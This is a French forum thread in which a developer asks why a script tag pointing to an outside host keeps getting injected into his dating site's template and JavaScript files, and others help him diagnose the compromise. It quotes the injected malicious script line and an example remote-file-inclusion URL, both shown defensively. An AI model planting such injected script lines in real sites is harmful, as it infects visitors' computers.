Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2046 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  Malware apparaissant sur mon site ? Origine ?

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Malware apparaissant sur mon site ? Origine ?

n°2002557
massanu
Posté le 17-06-2010 à 17:19:08  profilanswer
 

Bonjour,
 
J'ai un soucis. Je devellope actuellement un site type "rencontre" en utilisant un CMS
 
Tout se passe bien en local, mais une fois mis en ligne, un malware apparait au bout de quelques heures sur toutes mes pages *.tpl
 
Je ne comprend pas comment c'est possible :??:
 
Voici la ligne qui apparait :
 

Code :
  1. <script src=http://vvhbiesbosch.nl/_notes/fpdf.php ></script>


 
Comment cela se passe t-il en général pour ce genre de problèmes ? Je suis carrément bloqué. :??:
 
Merci à vous :jap:


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
mood
Publicité
Posté le 17-06-2010 à 17:19:08  profilanswer
 

n°2002561
rufo
Pas me confondre avec Lycos!
Posté le 17-06-2010 à 17:53:24  profilanswer
 

Tu t'es fait hacker. T'as plus qu'à trouver la faille (vérifie si celle-ci est connue pour ton cms) et appliquer le correctif.


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002562
massanu
Posté le 17-06-2010 à 17:55:17  profilanswer
 

Finalement meme dans tout les fichiers *.js :/
 
Hacker tu penses réellement ?
 
Waouuu ca va etre une galère sans fin pour trouver la faille...


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002633
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 09:27:02  profilanswer
 

c'est une certitude.


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002767
massanu
Posté le 18-06-2010 à 14:16:21  profilanswer
 

Merci Rufo  
 
Voila la situation
 
J'ai rapatrié tout le site et nettoyé toutes les pages, retirant tout les bout de codes nouveaux, y'en avais un bon paquet
 
J'ai ré-uploadé, et le site re-fonctionnait normalement, la nuit est passé et ce matin c'est repartit pour exactement la même chose !
 
Ca me semble bizarre que ce soit un hacker, il est sur le qui-vive et me déteste :lol:
 
Sincèrement peut pas y avoir d'autre causes que ca ?


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002781
dwogsi
Défaillance cérébrale...
Posté le 18-06-2010 à 14:37:52  profilanswer
 

Ce genre de manipulation n'est pas forcément opérée par une personne physique. Ya des bot qui font ça très bien. Regarde les log de ton serveur web, si toutefois tu en as la possibilité.


---------------
-- Debian -- Le système d'exploitation universel | Le gras c'est la vie! | /(bb|[^b]{2})/
n°2002786
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 14:45:49  profilanswer
 

+1, un hack peut se faire par un bot. Il a repéré ton site comme étant vulnérable et il y repasse régulièrement pour voir s'il est toujours infecté ou pas. Si c'est pas le cas, il le réinfecte.
 
Pour info, ce type de malware a pour but d'infecter les PC des visiteurs. Donc, je serais toi, avant d'avoir trouvé la parade, je fermerais temporairement le site pour pas réinfecter d'autres personnes voire te faire black-lister par google ou d'autres sites/softs.
Ton site, ça serait pas Foto's VVHB? lui, il est déclaré comme dans dangereux car infecté par le même virus que toi. :/


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002793
massanu
Posté le 18-06-2010 à 15:04:41  profilanswer
 

Ha d'accord je vois
 
Mais comment trouver la parade ? La je suis en train de lancer un scan intégrale sur ma machine avec un Antivirus + un Anti Malware
 
Google a déjà black-listé mon site donc j'attend de corriger le problème pour le soumettre à nouveau
 
Non pas du tout, ce n'est pas ça mon site :/
 
La je vois pas comment je vais faire, après le scan intégral, je vais modifier tout les mots de passe (FTP + BDD + SITE)
 
Après, ça ne retirera pas la vulnérabilité sur le site...va la trouver :/


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002795
dwogsi
Défaillance cérébrale...
Posté le 18-06-2010 à 15:14:10  profilanswer
 

Au risque de me répéter...  

dwogsi a écrit :

Regarde les log de ton serveur web, si toutefois tu en as la possibilité.



---------------
-- Debian -- Le système d'exploitation universel | Le gras c'est la vie! | /(bb|[^b]{2})/
n°2002808
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 16:03:26  profilanswer
 

Et le virus ne vient probablement pas de ta machine mais d'un bot sur le web... C'est quoi ton cms? Spip, joomla, drupal...?


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
mood
Publicité
Posté le 18-06-2010 à 16:03:26  profilanswer
 

n°2002816
massanu
Posté le 18-06-2010 à 16:26:15  profilanswer
 

dwogsi a écrit :

Au risque de me répéter...  


 
Oui j'ai accès aux logs, faudrait chercher quoi dedans grosso merdo ?


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002818
massanu
Posté le 18-06-2010 à 16:26:57  profilanswer
 

rufo a écrit :

Et le virus ne vient probablement pas de ta machine mais d'un bot sur le web... C'est quoi ton cms? Spip, joomla, drupal...?


 
Ha ok
 
Non ce n'est pas un CMS classique, c'est un CMS special site de rencontre.


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002822
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 16:28:12  profilanswer
 

Peu importe, c'est basé sur quel soft?


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002824
massanu
Posté le 18-06-2010 à 16:31:00  profilanswer
 

rufo a écrit :

Peu importe, c'est basé sur quel soft?


 
 
Euhhh pourrais tu être un peu plus précis dans ta question ?
 
Merci à toi :jap:


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002826
dwogsi
Défaillance cérébrale...
Posté le 18-06-2010 à 16:31:47  profilanswer
 

massanu a écrit :

 

Oui j'ai accès aux logs, faudrait chercher quoi dedans grosso merdo ?

 

Des url qui renvoient des 404, personnellement j'en vois passer une bonne pelleté de temps en temps, ça test des failles courantes.

 

Tu peux aussi chercher des URL type index.php?page=http://site.com/attack.txt

 

Tu peux aussi réduire la tranche de recherche en fonction du moment auquel est apparu le script sur ton site.

 

Pour autant que je sache, ya pas de meilleur solution. Ceci-dit, les logs me paraissent être le meilleur point de départ.

 
massanu a écrit :

 


Euhhh pourrais tu être un peu plus précis dans ta question ?

 

Merci à toi :jap:

 


Et bien si tu as utilisé un CMS déjà tout fait, il doit bien porter un nom ? Et peut être même est-il dérivé d'un autre CMS, type Joomla, Drupal, etc.

Message cité 1 fois
Message édité par dwogsi le 18-06-2010 à 16:34:32

---------------
-- Debian -- Le système d'exploitation universel | Le gras c'est la vie! | /(bb|[^b]{2})/
n°2002828
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 16:35:00  profilanswer
 

massanu a écrit :


 
 
Euhhh pourrais tu être un peu plus précis dans ta question ?
 
Merci à toi :jap:


 
Ton cms, c'est quoi son nom! C'est basé sur quel produit?  :pt1cable:


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002831
massanu
Posté le 18-06-2010 à 16:42:18  profilanswer
 

dwogsi a écrit :


 
Des url qui renvoient des 404, personnellement j'en vois passer une bonne pelleté de temps en temps, ça test des failles courantes.
 
Tu peux aussi chercher des URL type index.php?page=http://site.com/attack.txt
 
Tu peux aussi réduire la tranche de recherche en fonction du moment auquel est apparu le script sur ton site.
 
Pour autant que je sache, ya pas de meilleur solution. Ceci-dit, les logs me paraissent être le meilleur point de départ.
 


 

dwogsi a écrit :


 
 
Et bien si tu as utilisé un CMS déjà tout fait, il doit bien porter un nom ? Et peut être même est-il dérivé d'un autre CMS, type Joomla, Drupal, etc.


 
 
Ok je vais jeter un oeil aux logs :)
 
J'avais déjà remarquer des pages d'erreurs bizarres en matant mes stats.
Des accès que je n'ai jamais fait (alors que le site n'est pas encore officiellement lancé mais en test en ligne) générant des 404
 
Voici les lignes qui apparaissaient déjà :
 
 

Code :
  1. www.adresse.com/iphone/
  2. www.adresse.com/m/
  3. www.adresse.com/mobi/
  4. www.adresse.com/mobile/
  5. www.adresse.com/test-blog/wp-login.php
  6. www.adresse.com/test/blog/wp-login.php
  7. www.adresse.com/backup/wp-login.php
  8. www.adresse.com/blog-old/wp-login.php
  9. www.adresse.com/blog/backup/wp-login.php
  10. www.adresse.com/blog/wp-login.php
  11. www.adresse.com/blog/wp/wp-login.php
  12. www.adresse.com/blog_old/wp-login.php
  13. www.adresse.com/cms/wp-login.php
  14. www.adresse.com/old/wp-login.php
  15. www.adresse.com/wordpress/wp-login.php
  16. www.adresse.com/wordpress2/wp-login.php
  17. www.adresse.com/wp-login.php
  18. www.adresse.com/wp/wp-login.php
  19. www.adresse.com/WP/wp-login.php
  20. www.adresse.com/Wordpress/wp-login.php
  21. www.adresse.com/text/xml


 
 
 
Je n'ai jamais fais ces accès la :/
 
Oui le CMS est le suivant : http://www.datingpro.com/ mais il n'est pas basé sur joomla ou Drupal, vu que je l'ai pas mal modifié, c'est du spécifique de chez eux.
C'est du PHP utilisant Smarty ;)


Message édité par massanu le 18-06-2010 à 16:45:06

---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002833
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 16:52:36  profilanswer
 

Ca c'est typiquement un bot qui essaye de détecter la présence de produits GPL classiques (ex : wordpress qui est un soft de blog).


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002835
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 16:57:01  profilanswer
 

"dating pro" xss dans google -> ça sort des trucs à ce sujet...


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002836
massanu
Posté le 18-06-2010 à 16:58:56  profilanswer
 

Ha ok  
 
Et bien la après avoir maté les logs de cette nuit :
 
J'ai des accès répétés à une page auquel je n'accède jamais sur le site, en effet le CMS contient un module "blog_calendar.php"  
 
Cependant aucun lien sur le site ne mène à cette page (qui existe cependant sur le serveur)
 
Ca peux surement venir de la ? :??:
 
Et chose encore plus bizarre : Je possède pour ce site 6 noms de domaines. Ils pointent tous dessus et bien les accès sur cette fameuse page sont fait par presque tout les noms de domaine (alors que personnellement je j'en utilise que 2, jamais les autres)
 
Ca commence à devenir bizarre :/


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002845
rufo
Pas me confondre avec Lycos!
Posté le 18-06-2010 à 17:17:32  profilanswer
 

Le robot génère probablement des noms de domaines aléatoirement (à moins qu'il n'ait accès à une BD de noms de domaines) et effectue toujours les mêmes tests de présence de produits ayant des failles.


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Cantine Calandreta : http://sourceforge.net/projects/canteen-calandreta
n°2002850
massanu
Posté le 18-06-2010 à 17:31:02  profilanswer
 

C'est vraiment chiant, merci pour votre aide ca m'a fais apprendre pas mal de chose
 
Mais je n'ai toujours pas la solution, j'arrive pas a comprendre d'ou ca peux venir, ou est-ce que les bots entrent :(
 
Saloperie c'est la première fois que ca m'arrive ca :/


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002860
massanu
Posté le 18-06-2010 à 18:13:22  profilanswer
 

Petite question :
 
Au sujet des droits/permissions sur les fichiers, je viens de voir que certains fichier corrompu (a nouveau) avait des droits bien trop laxiste
 
y'a t-il une règle particulière à ce niveau la ? Cela viens peut être de ca déjà


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002862
NewsletTux
&lt;Insérez ici votre vie /&gt;
Posté le 18-06-2010 à 18:19:32  profilanswer
 

oui.
Typiquement, rarement le X (exécution).
de temps en temps le W (écriture)
 
PAs de "règle" particulière car ça dépend de tes fichiers, mais un fichier PHP qui ne fait qu'afficher les X derniers messages du forum n'a pas besoin d'être en 777 :/


---------------
NewsletTux - outil de mailing list en PHP MySQL
n°2002863
NewsletTux
&lt;Insérez ici votre vie /&gt;
Posté le 18-06-2010 à 18:20:59  profilanswer
 

Regarde aussi tout ce que peuvent faire les gens : peuvent-ils écrire sur ton serveur ?
Par exemple peuvent-ils uploader une pièce jointe ? un avatar ?
ce sont déjà des failles de sécurité ça (car tu ne sais rien de ce que contiennent ces docs).


---------------
NewsletTux - outil de mailing list en PHP MySQL
n°2002865
massanu
Posté le 18-06-2010 à 18:24:30  profilanswer
 

- Les fichiers *.tpl (fichiers de templating, seulement de l'affichage) peuvent être exclusivement en lecture j'imagine
 
- Les fichiers php n'ont normalement pas besoin d'être en ecriture j'imagine, vu qu'ils font des traitements, mais rien n'est écrit dedans (tout est en base ou fichier xml)
 
Ca me semble bon ?
 
- Oui il y'a des upload d'avatar etc... cependant la faille ne viens pas de la, car le site n'est pas lancé, je suis le seul a connaitre l'adresse et pourtant le virus/bot/malware s'en prend à mon site en même pas 2heure après chaque nouvel version uploadée :/


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002918
massanu
Posté le 19-06-2010 à 01:50:59  profilanswer
 

Dites moi :
 
- Les adresses Ip des robot google sous bien sous la forme "66.249.66.*" ?
J'ai checker mes logs sur 2 jours, ce sont ces adresses la qui accède à mon site
 
- Il semblerais que j'ai trouver le type de virus que je subis ce sont des "Gumblar" like. Donc si c'est le cas, cela dois venir de ma machine.
Cependant malgré un scan complet avec NOD32 il ne m'a pas trouvé grand chose :/
 
Je vais tester Avast je pense et changer tout mes mots de passe à nouveau.


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2002921
massanu
Posté le 19-06-2010 à 02:41:36  profilanswer
 

Voila ce qui m'arrive  
 
http://webcache.googleusercontent. [...] clnk&gl=fr
 
:)


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
n°2006460
omega2
Posté le 01-07-2010 à 22:26:09  profilanswer
 

massanu a écrit :

- Oui il y'a des upload d'avatar etc... cependant la faille ne viens pas de la, car le site n'est pas lancé, je suis le seul a connaitre l'adresse et pourtant le virus/bot/malware s'en prend à mon site en même pas 2heure après chaque nouvel version uploadée :/

T'as acheté le nom de domaine auprès d'un registar. Le nom de domaine est donc diffusé et connus par des serveurs DNS. La liste elle même des noms de domaines enregistré par les registar est disponible sur certains serveurs web (je l'ai découvert l'an dernier quand j'ai cherché comment google avait connus un nom de domaine que je n'avais indiqué à personne)
 
Croire qu'un script d'upload ne peut pas être en cause par ce que ton site n'est pas lancé est aberrant. A partir du moment ou tu te fais piraté ton site, il faut que tu considères que tous les fichiers accessible depuis le net sont des sources potentielles de faille que ces fichiers soient trouvable grâce aux liens du site ou qu'il faille tomber dessus par hasard. Pour info, il existe des dictionnaires d'attaques contenant des centaines de milliers de noms de fichier et de de dossier et donc beaucoup de chance que le non de ton script en fasse partie.
 
Il faut également considérer que si un service du serveur est mal sécurisé (ftp public en lecture/écriture par exemple) , l'attaque peut être passé par ce biais là.
 

massanu a écrit :

Dites moi :
 
- Les adresses Ip des robot google sous bien sous la forme "66.249.66.*" ?
J'ai checker mes logs sur 2 jours, ce sont ces adresses la qui accède à mon site
 
- Il semblerais que j'ai trouver le type de virus que je subis ce sont des "Gumblar" like. Donc si c'est le cas, cela dois venir de ma machine.
Cependant malgré un scan complet avec NOD32 il ne m'a pas trouvé grand chose :/
 
Je vais tester Avast je pense et changer tout mes mots de passe à nouveau.


Heu, les "gumblar like" sont des malware qui vont faire croire à ton ordi que tel ou tel site est situé à une adresse donné en outrepassant les données des serveurs DNS.
Rien a voir avec l'attaque de ton site web.
 
 
 
Pour les IP des googlebots : http://www.google.com/support/webm [...] swer=80553
 
 
 
 
Bon, voyons vite fait ce que t'as fait :
1) est ce que tu t'es renseigné sur le net pour savoir quelle sont les failles connus du CMS que tu utilises (comme suggéré plus haut)
2) est ce que tu as regardé dans les logs d'accès de ton serveur quels sont les adresses correspondant à des fichiers qui existent sur ton site (en général code http 200) et qui ont été accédé plusieurs fois depuis une adresse IP qui n'est pas la tienne ou à des horaires qui ne sont pas tes horaires habituels
3) est ce que tu as regardé dans les logs d'erreurs et dans ton log d'accès de ton serveur (en gros codes http différents des 300, 404 et 200) si aucune page n'a entrainé un plantage du serveur http ou d'un des modules du serveur http
4) est ce que tu as effectué un scan de port vers ton serveur (si c'est pas toi qui l'a configuré, demande d'abord s'il n'y a pas un anti scan d'actif) pour vérifier les services qui répondent. Tout service actif est une faille potentielle.
5) Est ce que tu te connectes uniquement à ton serveur à l'aide de connection crypté (par exemple sftp au lieu de ftp, putty avec liaison ssh au lieu d'une connection en clair, etc)
6) Tu as utilisé NOD32 qui est un antivirus, as tu utilisé également un antimalware tel que "search and destroy"? Les antivirus en cherchent moins que les logiciels spécialisés
7) Vu que vous utilisez une version modifié du CMS, est ce que vous avez un spécialiste sécurité dans votre équipe? (en gros quelqu'un qui s'y connait vraiment même s'il n'en a pas le titre) Quand on modifie un site sans connaitre les failles possible, on peut en ouvrir sans s'en rendre compte.

n°2006483
massanu
Posté le 02-07-2010 à 04:25:35  profilanswer
 

omega2 a écrit :

T'as acheté le nom de domaine auprès d'un registar. Le nom de domaine est donc diffusé et connus par des serveurs DNS. La liste elle même des noms de domaines enregistré par les registar est disponible sur certains serveurs web (je l'ai découvert l'an dernier quand j'ai cherché comment google avait connus un nom de domaine que je n'avais indiqué à personne)
 
Croire qu'un script d'upload ne peut pas être en cause par ce que ton site n'est pas lancé est aberrant. A partir du moment ou tu te fais piraté ton site, il faut que tu considères que tous les fichiers accessible depuis le net sont des sources potentielles de faille que ces fichiers soient trouvable grâce aux liens du site ou qu'il faille tomber dessus par hasard. Pour info, il existe des dictionnaires d'attaques contenant des centaines de milliers de noms de fichier et de de dossier et donc beaucoup de chance que le non de ton script en fasse partie.
 
Il faut également considérer que si un service du serveur est mal sécurisé (ftp public en lecture/écriture par exemple) , l'attaque peut être passé par ce biais là.
 


 

omega2 a écrit :


Heu, les "gumblar like" sont des malware qui vont faire croire à ton ordi que tel ou tel site est situé à une adresse donné en outrepassant les données des serveurs DNS.
Rien a voir avec l'attaque de ton site web.
 
 
 
Pour les IP des googlebots : http://www.google.com/support/webm [...] swer=80553
 
 
 
 
Bon, voyons vite fait ce que t'as fait :
1) est ce que tu t'es renseigné sur le net pour savoir quelle sont les failles connus du CMS que tu utilises (comme suggéré plus haut)
2) est ce que tu as regardé dans les logs d'accès de ton serveur quels sont les adresses correspondant à des fichiers qui existent sur ton site (en général code http 200) et qui ont été accédé plusieurs fois depuis une adresse IP qui n'est pas la tienne ou à des horaires qui ne sont pas tes horaires habituels
3) est ce que tu as regardé dans les logs d'erreurs et dans ton log d'accès de ton serveur (en gros codes http différents des 300, 404 et 200) si aucune page n'a entrainé un plantage du serveur http ou d'un des modules du serveur http
4) est ce que tu as effectué un scan de port vers ton serveur (si c'est pas toi qui l'a configuré, demande d'abord s'il n'y a pas un anti scan d'actif) pour vérifier les services qui répondent. Tout service actif est une faille potentielle.
5) Est ce que tu te connectes uniquement à ton serveur à l'aide de connection crypté (par exemple sftp au lieu de ftp, putty avec liaison ssh au lieu d'une connection en clair, etc)
6) Tu as utilisé NOD32 qui est un antivirus, as tu utilisé également un antimalware tel que "search and destroy"? Les antivirus en cherchent moins que les logiciels spécialisés
7) Vu que vous utilisez une version modifié du CMS, est ce que vous avez un spécialiste sécurité dans votre équipe? (en gros quelqu'un qui s'y connait vraiment même s'il n'en a pas le titre) Quand on modifie un site sans connaitre les failles possible, on peut en ouvrir sans s'en rendre compte.


 
 
Merci pour le temps que tu as pris a rédiger ton post :jap:
 
Il semblerais que le problème soit résolu (semblerais)
En effet j'ai vider mon FTP, passé ma machine complète à deux reprises avec NOD32 et AVAST à jour.  
Supprimer les comptes FTP enregistré par mes 2 clients FTP
Fait un upload sur un backup "safe"
 
Et depuis mon dernier post sur ce sujet, aucun malware de retour. Il semblerais bien que le soucis venais de ma machine et non du CMS.


---------------
Oui je sais, je suis une merde en orthographe et alors ? Altcoin list: https://docs.google.com/spreadsheet [...] =286417424
mood
Publicité
Posté le   profilanswer
 


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  Malware apparaissant sur mon site ? Origine ?

 

Sujets relatifs
plan de siteCreation de site communautaire - aide svp
SQL: my.cnf : un vrai site qui explique les options en details ?Autoriser l'affichage de mon site qu'a Facebook
Comment récupérer des informations sur un site web ?[web] outil pour creation de site web (CMS ?)
Test site Internet sur différents navigateursMusique de fond sur site
Site perso attaqué : index.* => 0 koFormulaire PHP, retour sur ma page d'origine
Plus de sujets relatifs à : Malware apparaissant sur mon site ? Origine ?


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR